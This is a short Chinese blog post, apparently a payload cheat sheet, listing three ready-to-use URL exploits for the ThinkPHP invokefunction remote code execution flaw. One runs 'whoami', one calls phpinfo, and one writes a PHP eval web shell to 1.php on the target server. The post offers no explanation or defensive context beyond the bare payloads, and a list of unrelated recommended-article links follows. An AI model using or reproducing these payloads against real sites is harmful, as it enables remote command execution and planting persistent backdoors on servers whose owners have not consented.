Thinkphp(TP)

谪仙1232024-09-24 12:16

1.远程命令执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.远程代码执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

3.getshell

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST[cmd]);?>' >1.php

相关推荐
Hacker_Nightrain5 小时前
网络安全CTF比赛规则
网络·安全·web安全
网络安全指导员6 小时前
恶意PDF文档分析记录
网络·安全·web安全·pdf
渗透测试老鸟-九青7 小时前
通过投毒Bingbot索引挖掘必应中的存储型XSS
服务器·前端·javascript·安全·web安全·缓存·xss
白总Server7 小时前
JVM解说
网络·jvm·物联网·安全·web安全·架构·数据库架构
kali-Myon8 小时前
ctfshow-web入门-SSTI(web361-web368)上
前端·python·学习·安全·web安全·web
网安_秋刀鱼8 小时前
java组件安全
web安全·网络安全·1024程序员节
Hacker_Oldv8 小时前
【网络工程】计算机硬件概述
前端·网络·安全·web安全
群联云防护小杜10 小时前
CC攻击为什么难防御?
网络·网络协议·安全·web安全·udp
Hacker_Fuchen13 小时前
【网络安全】OSI网络安全体系结构
网络·安全·web安全
热门推荐
01玄机平台应急响应—webshell查杀02Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO03【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总04新版微信小程序获取用户手机号05文件或文件夹名称中有空格如何批量去除06组基轨迹建模 GBTM的介绍与实现(Stata 或 R)07【TC3xx芯片】TC3xx芯片电源管理系统PMS详解08优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间09基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测10【Flutter】基于 GetX 实现 Dio 的生命周期自动化